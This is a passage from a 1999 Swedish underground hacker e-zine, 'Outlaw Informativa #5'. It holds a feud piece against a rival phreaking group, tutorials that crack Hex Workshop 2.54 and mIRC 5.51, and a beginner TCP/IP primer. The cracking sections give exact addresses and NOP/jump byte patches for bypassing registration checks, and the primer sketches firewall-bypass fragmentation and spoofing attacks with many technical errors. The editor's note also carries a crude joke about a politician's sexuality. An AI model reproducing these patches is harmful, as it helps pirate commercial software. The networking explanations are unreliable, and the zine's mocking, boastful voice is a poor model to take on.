OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
22:14 1999-05-18
Heretics Inc. Presenterar...
_______ __ __ Informativa
| |.--.--.| |_| |.---.-.--.--.--.
| - || | || _| || _ | | |#5|
|_______||_____||____|__||___._|________|
×=======================================×
| |
| ¤ Disclaimer |
| ¤ Editor |
| ¤ Mederkande |
| ¤ Är 07nio75 riktiga phreakers? |
| |
| ¤ Cracka Hex Workshop 2.54 |
| ¤ Cracka mIRC 5.51, mIRC Co. Ltd |
| ¤ TCP/IP Tutorial för newbies |
| ¤ Läs lokala filer i NT |
| ¤ Wingates |
| ¤ Säkerhets hål i Netbios |
| ¤ nato.int, whitehouse.gov hacked |
| |
| ¤ Enkelt om Terminaler |
| ¤ GSM kan läsa av Elmätare |
| ¤ Cellulär styrning, update |
| ¤ Lite rippat om AXE från Fidonet |
| ¤ Teleutrustning som klarar år2000 |
| |
| ¤ Copyright |
| ¤ Prenumeration |
| ¤ eX1t() |
| |
×=======================================×
w w w . h e r e t i c s . c j b . n e t
-Vilka är det som står misstänkta? Är det
unga hackers? Jo, det är unga, men jag
skulle inte vilja kalla dem för hackers
eftersom det ordet ofta förknippas med
någon som är duktig på datorer -
+-------------------------------------------------------------+
¤ Disclaimer |
+-------------------------------------------------------------+
Vi tar inget ansvar för vad du andvänder informationen till.
Information är endast till för att läsas och i utbildnings
syfte. Myndighetspersonen är förbjudna enligt lag att läsa
denna information
+-------------------------------------------------------------+
| Editor [Knash] |
+-------------------------------------------------------------+
Var hälsad till issue #5 av Outlaw Informativa !
Visste du att Carl Bilt är homosexuell? NÄHHEJ, jag bara skoja.
Det va en snubbe som klagade lite på mig och sa att jag hade
skickat Melissa viruset till honom (!?!?!?!?!) hehe, vilket jag
inte har gjort. Men däremot skickade jag källkoden i O-I #4,
men det är en helt annan femma. Zaqe hittade en tele-box med
något slags kretskort i, grymmt..ahh ?? Jaja, i detta nummer
blir det lite blandat, tja..lite networking, telefoni, nt och
lite cracking. De vanligaste så klart. Hoppas tty får något
att titta på den här gången.
+-------------------------------------------------------------+
| Medverkande |
+-------------------------------------------------------------+
Knash [knash@linux.nu:keytrace@usa.net]
Gazzaud [Gazzaud@operamail.com]
Overmarzz [mixtile112@hotmail.com]
Axxezz [secure contact]
+-------------------------------------------------------------+
| Är 07nio75 riktiga phreakers? [Overmarzz]|
+-------------------------------------------------------------+
Jag surfade in på deras sida och kunde snabbt konstatera att
den verkligen inte var bra..
1: På Main så står där "...Sveriges aktivaste Phreking grupp.."
Hahaha..Aktiva?...nja..dom springer runt med sina Beige och
"Phreakar" jappasar...japp...då är man verkligen Phreaker. Dom
har inga egna txt filer och på ezine står där ex bilder längst
upp(?). Om ezinet? Samma löjliga text om aktivaste grupp och
dom börjar väldigt elit genom att skriva 1ntr0 ..
sen på disclaimer..
"Informationen i vårat zine är ändast till för att läsas, och
om du gör något olagligt shit efter at"
LOL...shit..rollie kan engelska..
Beige boxing skola..? Har inte alla svenska phreakers redan
skrivit det?
hmm
all'4'free? iofs så heter det everything... Men att sno mm är
inte speciellt skönt..Boxing lista.. Blast: Bra om du vill spr-
änga nåns trummhinna...HAHA..ska en telefon lur lira 145-155
db?? HAHA
---
Heretics?
"Heretics Medlemmar" förstör för 07nio75 medlemmar. Dom påstog
att en heretics medlemm vid namnet "Phencier" hadde sparkat och
slitit sönder Oizo's Japan. Phencier är inte på något sätt
aktiv eller medlem i hertics och jag tycker det är väldigt krä-
ngande av R Tyler att gå lös på tangenbordet innan nån fakta
ligger på bordet. Det oproffitionela uppförandet kan tolkas på
många sätt och jag har krävt en artikel som reder upp detta i
nästa zine. Den listan har jag sett nånstans och den är 100%
rippad och översatt
---
Carding..?
Inte bli "bustad" ..hahaha...
Oj vad svårt för dom att spåra det..men rollie lurar dem med
sina enastående kunskaper och till sist har han skrivit
"..Phreaking är inte bara kul, utan även en överlevnads stil."
Jag själv tycker inte riktigt om att "kriga" men han började
helt utan fakta...Jag har aldrig sagt att jag är en elit
Phreaker/hacker så kom inte oh klaga!
Jag känner 2 medlemmar i 07975..[S]tasS är skit juste men en
REN irc:are ^MaZz^.. Har aldrig Phreakat..Vet inte vad lmhs
eller beige är. Dom har väldigt höga förväntningar ...HAHAHAHA
+-------------------------------------------------------------+
| Cracka Hex Workshop 2.54 Breakpoint Software [Gazzaud] |
+-------------------------------------------------------------+
[Skydd]
Cindirella/Seriell
Nivå: Medel
Ingrepp: NOP/INVERT
-==- Förord -==-
För alla er som behöver en bra Win32 hexeditor, här är en
av mina favoriter. Den är någorlunda liten, 3 897 706 byte
installerad och väldigt kraftfull. Jag har tidigare använt
version 2.00 men efter det att Axxezz påpekat fördelen med
den nya versionen så laddade jag hem den från www.bpsoft. com.
version 2.00 men efter det att Axxezz påpekat fördelen med
En hel del buggfixar, men jag måste erkänna att jag är lite
besviken på deras protection-scheme. Precis som med The
Customiser sparade jag mina anteckningar för att ge
nybörjarna lite steg-för-steg.
--// Grabbing the Tools of the Trade \\--
// Str Ref \\
Först kollade jag runt lite efter användbara strängreferenser.
Str Ref -> "Demonstration Version"
00429B6E
00429B51 movsx eax, word ptr [0048CFF8]
00429B58 test eax,eax
00429B5A jne 00429B88
Egentligen ingenting användbart eftersom vi inte har någon
funktion utan bara en kontroll av en variabel. Men kanske
kan vi ha lite tur, så vi söker efter [0048CFF8] och hittar
den vid: 00429610, 004299AF, 00429B51. Tyvärr bara kontroller,
ingen funktion som lägger något värde i variabeln. Så mycket
för strängreferenser. Så vi tar och börjar nysta i en annan
ände.
-%%- Dialoger -%%-
Som ni ser i data sektionen av HexWorkshop finns det många
dialoger i programmet. En för första gången vi kör programmet,
en för när vi börjar få lite tid kvar, en när tiden gått ut men
vi fortfarande har lite "grace time" kvar och en när det är
totalkört. En rolig sak är att de också har en dialogruta som
dyker upp om versionen blivit för gammal.
DialogID_0073, referenced at:
00425C55
is referenced by: 004297F0
00461D20 (Drawing the dialog etc)
Observera den här funktionen :
00429776 call 0042E800 (Återkommer till den alldeles strax)
DialogID_00C1, referenced at:
004273D5, called by 00429792
Look at 00429776 -> if je, then call 0042EA35 and if ne
there, call 00425C30 which shows DialogID_0073.
Ser ni det märkliga? Känner ni lukten av rädd kod? Känner ni
stanken av deras protection? Jag tror *sniff* bestämt *sniff*
att den *sniff* kommer från... *sniff*
Registret! Sparka igång Regedit (C:\Windoze\Regedit.exe) så tar
vi oss en titt.
[HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\]
CurrentVersion = "2.50" <- varför inte 2.54?
Path = "Drive:\PAth\HWORKS32.EXE"
Ouw...
[HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\2.50]
Major = 0xF8F3F830
Minor = 0x00000000
Om ni vill gå in på alla pinsamma detaljer angående detta så
tittar ni i funktionerna 0042EA35, 0042E800 & alla de andra som
anropas för att avgöra vilken dialogruta som ska visas. Jag ska
dra en snabbgenomgång för alla som är nyfikna men inte orkar
kolla. Trots BreakPoints försök att visa på motsatsen så har
Major och Minor ingenting med versionen avprogrammet att göra
(NÄHÄ! ;-). Major lagrar ett datum, i mitt fall 7nde December
1999 (Bäst före-datum tydligen), och Minor är en statusvariabe-
l. Testa att ändra Minor till 0xBB000000 och starta HexWorksho-
p. Kul dialogruta, eller hur? Ni kan nu ändra tillbaks om ni
vill, men jag lämnade registret sådär för att veta när vi
lyckats 'registrera' programmet.
--/-/ Nu över till allvaret \-\--
Alla dessa kontroller mot Registret ligger inom funktion
004295A6, som anropas från 0042999A. Denna anrops-snutt av kod
anropas bara beroende på ett (C) hopp vid 00429980.
00429978 call 00429403
0042997D cmp eax,1
00429980 jne 0042998D (kontrollerna)
00429986 xor eax,eax
00429988 jmp 00429E9E
Hmmmmm... Intressant? Faktiskt inte ett dugg. Men ibland kan
det vara kul och göra er lite nervösa :-). Funktion 00429403
kontrollerar bara om det finns en HW.INI, säkert pga bakåt-kom-
pabilitet till 16-bit.
--{ Trace Main }--
Så eftersom vi nu har hamnat i programmets Main-sektion
(eller WinMain om vi ska vara riktigt petiga (inte för att det
behöver vara WinMain i ett Assemblerprogram)). Så ska vi väl ta
och avsluta den här lilla, men ack så lärorika, utflykten,
eller vad säger ni? Vi kollar igenom alla funktioner som
anropas innan den som vi just kom ifrån (där är det ju redan
bestämt om vi är Registrerade eller inte) och hittar 00437540.
Tjohopp. Kunde vi tagit en enklare väg?
Jajamensan: Str Ref -> "HEXWORKS.REG",
men då hade ni ju missat halva deras protection. Det hade ju
varit illa. Så ta ett djupt andetag, titta igenom funktionen,
följ koden, känn hur den rör sig, vart den går och ta sedan
fram skalpellen och knäck HexWorkshop 2.54.
|------------------------------------|
[Slutsats]
004375AC - NOPNOPNOPNOPNOPNOP
004375D5 - NOPNOP
004375FB - E91901000000
Fyll HEXWORKS.REG med 220-250 byte.
-----///: Efterord :\\\-----
Så nu har vi 'Registrerat' ett i framtiden viktigaste av våra
verktyg. Ska bara ta en liten funderare kring deras protection-
scheme. Först och främst tycker jag deras Registry-taktik är i
lite vekaste laget. Vem är den avsedd att lura? Vanliga
användare? Tror inte dom är inne i Registret och röjer allt
för ofta. Crackers? När en nybörjare som jag lyckas lista ut
deras protection? Ooo, känner trygga BreakPoint. Dessutom
förstår jag inte poängen med att läsa från Registret så många
gånger, en per eventuell dialog. Om de nu försökte lura oss att
Minor & Major hörde till versionen, varför inte bara läsa in
dessa värden en gång? Ingen sitter och kontrollerar versionen
på sitt program, runt fem gånger, *i rad*. Deras .REG fil är
inte mycket till skydd heller (som ni märkte), mestadels pga
att den finns med från början. Tom givetvis, eftersom dom inte
gärna kan lämna ut ett seriell/användarnamn. Men hur många
börjar inte fundera om dom ser en *tom* fil med i sin
installation? Som dessutom slutar på ändelsen .REG. Så hur är
nu .REG uppbyggd? Bra, fråga. Jag vet inte, och jag tänker
heller aldrig ta reda på det. Ända syftet med det vore för att
göra en KeyGenerator och sådant gör jag inte. Det har inget med
någon gloriös etik att göra, utan bygger mer på två faktum:
vill dom ha ett fungerande program, knäck det själva och det
faktum att seriellnummer finns det redan flera miljoner lite
överallt på nätet. Det är ingen som lär sig någonting av det.
/// Skriven av:
Gazzaud
@ #SweHack, #Programming.se, #crack
Mailto: Gazzaud@operamail.com
\\\
+-------------------------------------------------------------+
| Cracka mIRC 5.51, mIRC Co. Ltd [Gazzaud] |
+-------------------------------------------------------------+
***************************************************
* *
* mIRC 5.51 *
* *
* mIRC Co. Ltd *
* *
***************************************************
[Skydd]
Cindirella/Seriell
Nivå: Enkel
Ingrepp: NOP
-==- Förord -==-
För att skapa ett bättre intresse kring cracking (inte malicio-
us hacking utan +ORC's cracking) så ska jag försöka leverera
lite cracks av och om lite mer 'mainstream' program. Annars har
det ju mestadels varit verktyg användbara för cracking. Alla
vet vad mIRC är, och just nu är 5.51 senaste versionen. Deras
protection är så enkelt att det är nästan enklare att cracka
deras program än att hitta ett seriellnummer eller ett
'ready-made' crack. Ni ska få se.
String Ref "Your registration has been entered
successfully." @ 00436E04
String Ref "Sorry, your registration name and
number don't match!" @ 00436E68
Ref by: (C) 00436D81
00436D7A call 00493CFC
00436D7F test eax,eax
00436D81 je 00436E22
00493CFC is Ref by: 00436D7A, 00493E93
Hmmmm?
Näe...
[HEX]
00493E9A NOPNOP
00436D81 NOPNOPNOPNOPNOPNOP
--// Avslutning \\--
Jupp. Mer än så var det inte. Jag gjorde den lite
avsiktligt kort, eftersom ingen verkar bry sig om
några utförligare beskrivningar ändå. Kommentarer
skickas till det vanliga stället...
// Gazzaud
+-------------------------------------------------------------+
| TCP/IP Tutorial för newbies [Knash] |
+-------------------------------------------------------------+
TCP/IP är ett Nätverks protokoll som från början var utvecklat
av ARPAnet. Protokollet som tar hand om en stor del av nätv-
erks trafiken. Jag såg faktiskt en film om Internet's historia,
titeln på filmen var ju lite högt lam faktiskt (Historian om @)
men innehållet va mycket intressant, dom visade den första ser-
vern osv. som såg ut som ett kylskåp. TCP/IP står för Transmis-
sion Control Protocol/Internet Protocol. TCP/IP är även en del
av kerneln i Unix, även är TCP/IP ett OSI baserat protokoll
(läs om OSI senare i artikeln) För er som inte vet så står OSI
för: Open System Interconnection.
Till Alla Newbies: Internet är ett nätverk, faktiskt ett
WAN (Wide Area Nework) alltså flera LAN (Local Area Network)
som är ihopkopplade. Från början va det bara ett LAN som va
baserat på TCP/IP, men det va länge sen då ARPAnet pysslade.
¤ Open System Interconnection [OSI]
¤ TCP/IP Modellen
¤ TCP Header
¤ TCP Flags
¤ IP Header
¤ UDP Header
¤ Sammanfattning av huvudsyftena i tcp/ip
¤ Vanliga TCP/IP attacker
¤ UDP och TCP, skillnader och nackdelar
¤ Portar som andvänder TCP/IP, UDP
¤ Gå vidare
¤ Efterord
¤ Tack Till
¤ Källor
-==- Open System Interconnection [OSI] -==-
OSI modellen är baserat på 7 olika lager.
7. Application Layer
6. Presentation Layer
5. Session Layer
4. Transport Layer
3. Network Layer
2. Data Link Layer
1. Physical Layer
Jag tog dom på engelska, det ser bättre ut då.
Mellan dom olika lagrerna skickas paket, varje lager tar hand
om sin uppgift. , övre lager och nedre lager. När ett
paket skickas från din dator passerar den alla 7 lager, från 7
ner till 1. När du tar emot ett paket passerar den även då fast
den motsatta vägen, från 1 upp till 7.
Listan ovan är de standardiserade lagrerna, det kan finnas
andra namn för dem på andra platformer.
Man skulle kunna dela upp dom olika OSI Lagrerna i 2
sektioner.
Den övre delen av OSI Modellen tar hand applikationer, och är
ofta redan inprogrammerat i Mjukvaran.
Den lägre delen tar hand om transporten av data, IP paket osv.
Physical Layer och Data Link Layer är inprogrammerat i hårdvar-
an och mjukvaran.
-{ Övre Lagren }-
Application Layer
Presentation Layer
Session Layer
-{ Lägre Lagren }-
Transport Layer
Network Layer
Data Link Layer
Physical Layer
Application Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Applikations Lagret somboliserar den aktiva applikationen som
arbetar i Exempel: Netskape, Cute FTP, Word, Excel. Texten ell-
er bilden eller vad du nu arbetade med skickas vidare till nät-
sta lager.
Presentation Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta layer söker i dina bilder, ascii filer efter formaterad
text (typ, font size, font color, typsnitt) Presentation Layer
försöker även komprimera informationen så att paketet inte ska
bli stort och som ska resultera en snabb tcp/ip connection.
T.ex. en textfil skulle kunna komprimeras 80%, men med en bild
blir det mycket svårare pågrund av binärt innehåll osv.
Session Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta layer tar hand om trafiken och skickar paketen neråt till
de lägre lagret.
Transport Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta lager lägger till läsningar från CRC (Cyclic Redundancy
Checking) till eller från paketet. CRC kontrollerar så att
inte paketet har blivit forkortat på något sätt.
Network Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯
Konverterar och addresserar. "Logical Adresses" till "Physical
adresses" eller så som "nodenumbers" och IP Addresser. Detta
layer ligger väldigt nära hårdvaran. Alltså tar även nätverks
hårdvaran hand om detta, men inte endast!
Data Link Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta layer är updelat i två parter: LLC (Logical Link Control)
och MAC (Medium Access Control) LLC kontrollerar vilket protok-
ll som andvänds och arbetar tillsammans med Layer 3 (Network L-
ayer) MAC tar hand om vilka driv rutiner som används för de
olika Kommunikations Tillbehören. MAC kontrollerar även
frametype (t.ex. 120.4, 120.3, 120.6)
Physical Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Den hårdvaran som behövs för att kunna kommunicera (t.ex. fibe-
roptik kabel, nollmodem kabel, modem och nätverks kort)
Detta funkar ganska enkelt, paketen konverteras till ljus eller
elektriska impulser beroenda op vilken slags överförings media
man andvänder.
-==- TCP/IP Modellen -==-
TCP/IP modellen består av 4 olika lager. Även här kan man förd-
ela lagrerna i 2 olika sektioner vilket är ganska enkelt att
gissa.
Application Layer
Transport Layer
Internet Layer
Network / Physical Layer
Network / Physical Layer (Nätverk / Fysiskt lager)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
TCP/IP har en grymmt minimal uppgift att ta hand om Nätverks o-
ch de fysiska lagret. Eftersom det mesta lämnas åt hårdvaran...
så som Nätverks kort och Modem.
Internet Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är ett av de viktigista lagrerna eftersom den tar hand om addr-
essering av IP paket. Den tar också hand om växling av paketen
(Packet Routing)
Transport Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Juppz, detta är också ett mycket viktigt lager (checka bara på
namnet, så fattar du) Transporterings lagret tar emot data fr-
ån Applikations Lagret (Application Layer) som sedan Transport
Lagret förbereder för att sedan bli utskickat i Nätverket.
Det finns 2 olika typer av transport lager protokoll, UDP och
TCP, UDP står för User Datagram Protocol.
Application Layer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är ofta inprogrammerat i kommunikations program, t.ex. web bro-
wsers, FTP klienter, Telnet Klienter osv. Applikations Protoko-
llet definerar gränssnitt genom olika applikationer (program).
-==- TCP Header -==-
Alla TCP/IP "Headers" och "Layers" kommunicerar med varandra
och det är i princip det som är grejen med TCP/IP networking.
Jag tänker inte förklara allt i detalj när det gäller TCP Head-
ern och det finns 2 anledningar till det: Jag kan inte så myck-
et om TCP Headern över huvudtaget och att detta ska bara vara
ganska grunläggande.
TCP Header
¤ ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ SRC PORT ¤ DST PORT ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ SEQUENCE NUMBER ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ACK NUMBER ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ DATA ¤ Reserved ¤ U|RST|S ¤ Windows ¤
¤ OFFSET ¤ Field ¤ F|A|P ¤ Field ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ CHECKSUM ¤ URGENT PTR ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ¤
SRC Port (Source Port)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Där datorn sänder ut paketet skriver porten paket skickas
ifrån och skickar iväg det.
Size: 16 bit
DST Port (Destination Port)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är dit paketet ska, SRC port skickar paketet och DST port tar
emot den.
Size: 16 bit
Sequence Number
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Identifierar paketets plats följd av sekvens TCP överföringen.
Size: 32 bit
ACK Number
¯¯¯¯¯¯¯¯¯¯
ACK Står för acknowledgement som sen sammanbinder acknowledge-
ment number. ACK paketet tar SEQ numret från det paket den ska
verifiera och helt enkelt ökar med 1 (satt på on) När en conn-
ection är etablerad är alltid är ACK allid skickat.
Size: 32 bit
DO
¯¯
DO är en synonym och står för Data Offsets (All teknik som är
uppdelat i ett flertal delar andvänder alltid synonymer, t.ex.
telefonväxlar, internet protokoll) DO är ett nummer som indik-
erar var datan börjar.
Size: 4 bit
Reserved Field
¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är ett reserverat fält för obestämda tillfällen då data ska
överföras osv. Reserved Field är alltid är satt på (0)
Size: 4 bit
RST
¯¯¯
Reset Flag återställer en connection.
S
¯
Syn Flag, det finns något som kallas för TCP SYN Flooding där
buggar i TCP systemet utnyttjas. SYN står för synchronize sequ-
encenumber.
Låt oss säga att en klient förösker etablera en connection med
en server. Klienten och Servern växlar ett sätt med olika mede-
landen för att bilda en inre data struktur för att kunna klara
kontakten med servern (Har jag fel?)
Denna lilla sak kallas för 3-Way Handshake.
______________________________________________
TCP Connection Establishment (3-way handshake)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
3-way handshake börjar när klienten startar en "Connection Req-
uest" genom att överföra ett SYN Medelande till servern. När
servern tar emot SYN Medelandet så skapar servern en "entry"
i serverns oavgjorda TCP connection DATA struktur och skickar
ett SYN-ACK medelande som svar till klienten. Klienten avslutar
"3-way handshake" genom att svara med ett ACK medelande till
servern. Var kommer TCP SYN Flooding in i bilden ? .. jo för
att attacken (Flood) måste kunna skicka över data till datorn
måste den ju också etablera en connection-
Mer om "3-way handshake" kommer i senare artiklar, möjligtvis
i O-I #6.
F
¯
Fin Flag andvänds för att stänga connections (=anslutningar)
Varje avslutning av en connection skickar ett paket med Fin Fl-
ag, som måste bli bekräftad (godkänd kan man också säga) också
kan jag berätta att fyra paket andvänds för att stänga en
connection.
A
¯
Ack Flag
P
¯
Push Flag
WINDOW
¯¯¯¯¯¯
Numret som "data octets" börjar med den som indikerar i acknowl-
edgment field som sändaren självklart vill acceptera.
Size: 16 bit
CHECKSUM
¯¯¯¯¯¯¯¯
Detta är ett valfritt fält som säkerhets kollar så att datan i
ett paket inte är skadad. Checksum kontrollerar alltså i stor
del att det inte är skett några fel i tcp överföringen.
-==- TCP Flags -==-
TCP flaggorna är antingen satta 1(on) och 0(off)
SYN Flag
¯¯¯¯¯¯¯¯
SYN = synchronize
Denna flagga är satt på on när ett fjärr-system vill starta en
tcp anslutning.
ACK Flag
¯¯¯¯¯¯¯¯
ACK = acknowledge
När denna flagga är på on aktiveras "Acknowledgement field" i
TCP Headern.
FIN Flag
¯¯¯¯¯¯¯¯
När denna flagga är satt på on, talar den om för fjärr-systemet
att avsluta tcp anslutningen.
RST
¯¯¯
När denna flagga är satt på on talar den om för fjärr-systemet
att tcp anslutningen måste bli återställd (reset)
URG Flag
¯¯¯¯¯¯¯¯
URG = Urgent Pointer Field
När denna flagga är satt på on talar den om för "application l-
ayer Program" att paketet är angeläget.
PSH Flag
¯¯¯¯¯¯¯¯
PSH = Push Function
När denna flagga är satt på on, blir fjärr-systemet att ett
stort antal paket som är på väg.
-==- IP Header -==-
Alla paket från TCP och UDP blir skickade till Operatorn för
växling. IP lägger till en header innan paketen levereraras vi-
dare. IP Headern är mycket enklare en TCP men väldigt viktigt.
IP Header
¤ ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ VER ¤ LENGHT ¤ SERV TYPE ¤ PACKET LENGHT ¤
¤ IDENT ¤ DF ¤ MF ¤ FRAG OFFSET ¤
¤ TTL ¤ TRANSPORT ¤ HEADER CHECKSUM ¤
¤ SENDING ADDRESS ¤
¤ DESTINATION ADDRESS ¤
¤ OPTIONS ¤ PADDING ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ¤
!!! Alla defentioner tas inte med !!!
VER
¯¯¯
Ett enkelt litet fält som håller reda på vilken version av
protokollet som andvänds.
LENGHT
¯¯¯¯¯¯
Detta är längden på IP Headern.
PACKET LENGHT
¯¯¯¯¯¯¯¯¯¯¯¯¯
Detta är längden på hela paketet.
IDENT
¯¯¯¯¯
Ett enkelt litet fält som håller reda på vilken version av
Detta är en unik identifierad som andvänds för att re-assamble-
ra fragmenterade msg:s.
DF
¯¯
När denna flagga är satt på on går inte msg:et att fragmentera.
MF
¯¯
Denna talar om för fjärr-datorn att mer fragmentering av medel-
andet är på väg. Fragmenteringen blir "re-assembled" av Intern-
t Layer.
FRAG OFFSET
¯¯¯¯¯¯¯¯¯¯¯
Håller positionen av de specifika paketen i serien av fragment-
erade paket.
TTL
¯¯¯
TTL = Time To Live
Utan detta fält skulle alla data paket flyta omkring för allti-
d. När TTL är uppe så kasserar den alltid när ett data paket
flyter till punken 0(off) så "dör" dom.
TRANSPORT
¯¯¯¯¯¯¯¯¯
Detta fält innehåller numret från "Transport Layer Protocol"
som behandlas i käll systemet.
SENDING ADDRESS
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är adressen från sendnings systemet, alltså var ifrån paketen
kommer ifrån.
DESTINATION ADDRESS
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Är addressen dit paketet ska.
-==- UDP Header -==-
UDP Headern är mycket enklare än vad TCP Headern är eftersom
UDP headern inte sammanhåller lika mycket information som
TCP.
¤ ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ SRC PORT ¤ DST PORT ¤
¤ LENGHT ¤ CHECKSUM ¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤ ¤
Alla fälten i UDP headern är exakt samma som i TCP headern,
för att få en beskrivning är det bara att gå till titeln TCP
Header.
-==- Sammanfattning av huvudsyftena i tcp/ip -==-
TCP : Tar han om överföringen och ser till så att allt skick-
as iväg sen tar IP hand om var den ska skickas.
IP : Tar hand om adresseringen och routing av paket mellan
olika värdar och nätverk
ICMP: Är dock ett enskilt protokoll, men kommunicerar med
tcp/ip genom att rapportera fel osv.
ARP : Lite mera komplicerat, även detta kanske dyker upp i
senare artiklar. Skaffar fram hårdvaruadresser (MAC)
från olika som ligger i samma Nätverk.
-==- Vanliga TCP/IP, UDP attacker -==-
IP Hijacking
¯¯¯¯¯¯¯¯¯¯¯¯
Andvänds för att styra om TCP paket strömmen så du kan bli
godkänd och komma förbi skydd såsom t.ex. Firewalls, one-
time password och ticketing authentication.
Packet Fragmentation Attacks
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Jag har förklarat lite enkelt ovan om Packet Fragmentation, men
doch inte i helhet. Packet Fragmentation är en del av IP som d-
elar in datagram i flera olika delar vid överföringen som sedan
blir tillbaka delat till ett datagram när den nåt DST Port (De-
stionation Port)
Exempel:
SRC Port DST Port
.--------. _ .--------.
| | |P|_ | |
|Datagram| ===> ¯|P| _ ===> |Datagram|
| | ¯ |P| | |
'--------' ¯ '--------'
P = Paket (eng. packet) ..tänke att ni inte e så bra på engels-
ka som jag inte är =-o)
Attacken:
En Packet Fragmentation Attack kan andvändas för att komma
förbi en en befintlig Firewall, men detta beror inte på hur
Paket Fragmenteringen är uppbyggt, fast en liten del hur paket-
en blir "reassembled"
Ett datagram ska bli uppdelade i flera paket som lämnar huvud
portionen av paketet oförändard. Ok, men skit samma. Nu ska jag
berätta teoretiskt hur det funkar :-O
Elajt Cr1Xx0rH4Xx0r skapar ett litet paket som fodrar sig att
vara den första biten i ett "multi-packet datagram" Den är
är skriven på ett sätt som visar sig att den ska genom port 80
och ska till "http service" och port 80 är öppen överallt som
standard. Universitet, Arbeten har stor nytta av http idag, så
därför tillåter Brandväggen elr. Paket Filtret att paketet åker
förbi. Elajt Cr1Xx0rH4Xx0r ändrar värdet som hänvisar paketet
genom port 80 till port 23 som andvänds av telnet, men hoppsan
nu fick han ju telnet access också...
Voila ! ..firewalls och filter kan dra åt helvete !
PS. om du vill veta mera om Packet Fragmentation Attacks så
hänvisar jag dig till "TCP packet fragment attacks against
firewalls and filters" som är mycket informativ. Visserligen
så beskriver den inget praktiskt. Men de teoretiska går all-
tid före de praktiska DS.
IP Spoofing
¯¯¯¯¯¯¯¯¯¯¯
IP Spoofing eller IP Faking är en attack som ändrar dit
IP till ett annat. Detta kan andvändas för att gömma identitet
eller skydda dig mot DoS attacks (DoS=Denial Of Service)
Denial Of Service är attacker mot TCP/Ip såsom Flooding, Nuking
osv som kan få en tcp connection att hänga sig eller bli
upptaget så att tcp anslutningen inte kan andvändas.
ok. jag tog ju inte upp alla de vanligaste. Men hmm...jag har
ju inte studerst dem alla. Jag hade något underlig känsla i
kroppen att artikeln va brodskande.
-==- UDP och TCP, skillnader och nackdelar -==-
TCP andvänder en fast anslutning (som en kanal) där all data
går igenom medans UDP inte har fasta anslutningar, utan allti-
ng skickas iväg i form av Paket. UDP skulle kunna gämnföras med
radio och TCP med telefon. Signalerna från radion kan fångas
upp och manipuleras medans telefonens elektriska impulser skic-
las via en bestämt kabel. Du vet gamla ICQ använde ju sig av
UDP, det var därför dessa ICQ Spoofers funkade. En ICQ Spoofer
kunde alltså andra skicka messages från andra andvändare.
Kunde andvändas för att bryta vänskap osv. [h0h0]
Exempel på UDP connection
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
______ ______
| | --> --> | DST |
| UDP | ---> ---> | HOST | (Från Basics of TCP/IP)
| | --> --> | |
¯¯¯¯¯¯ ¯¯¯¯¯¯
Som du ser andvänder inte UDP en fast anslutning till DST Host
(Destination Host) Medans TCP andvänder en fast anslutning
